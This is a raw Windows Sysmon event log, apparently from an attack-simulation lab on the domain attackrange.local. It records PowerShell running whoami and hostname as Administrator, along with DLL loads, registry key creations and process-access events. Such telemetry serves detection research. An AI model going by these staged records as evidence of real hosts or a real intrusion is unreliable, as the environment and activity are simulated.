wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2593341(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25751e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2565f01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2573443(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572fb5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64) 154100x800000000000000057346684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.065{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 18141800x800000000000000057346683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:42.049{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x800000000000000057346682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:42.049{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 534500x800000000000000057346681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXE 12241200x800000000000000057346680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057346679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\nlaapi.dll10.0.14393.3808 (rs1_release.200707-2105)Network Location Awareness 2Microsoft® Windows® Operating SystemMicrosoft Corporationnlaapi.dllMD5=63EB5F68082B8C8C392E5DAC1D4EC678,SHA256=58EC364601FA6FE26525D8ADB44B7EDEFCFB73E72897C77B6E37F73E1C7BF871trueMicrosoft WindowsValid 734700x800000000000000057346678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\winrnr.dll10.0.14393.0 (rs1_release.160715-1616)LDAP RnR Provider DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationwinrnrMD5=B0DE13ABF238AB28E963629B977A012F,SHA256=43288C8A658C2F0CB0CB1C9D874506D6CEEF455AAB68CE2EF0D685DE8E3BA0C3trueMicrosoft WindowsValid 12241200x800000000000000057346677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057346676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057346675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057346674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057346673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057346672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057346671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\NapiNSP.dll10.0.14393.0 (rs1_release.160715-1616)E-mail Naming Shim ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationnapinsp.dllMD5=71514D9A6350A37B4F0BAA6ACB751771,SHA256=5DB99D6784900D85BB4A62E9F40B4EC628054D41B38A5E93F80C7A8BB066EBBBtrueMicrosoft WindowsValid 734700x800000000000000057346670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000057346669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.049{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057346665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exeMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1trueMicrosoft WindowsValid 10341000x800000000000000057346660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.033{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+30ef8c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2593341(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25751e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2565f01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2573443(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572fb5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64) 154100x800000000000000057346658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:41.977{8B6011A9-5BA1-618E-4FF3-04000000F101}7628C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000021219854Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:43.236{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85A4C6526296761315C830779D16330C,SHA256=F6BE2B584CAD6E234AA512474C8227718CE5977B9C3939F2744B7382B804B2C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057347332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.997{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 12241200x800000000000000057347331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.997{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.997{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.996{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.838{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 12241200x800000000000000057347314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.995{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.993{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.990{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.990{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 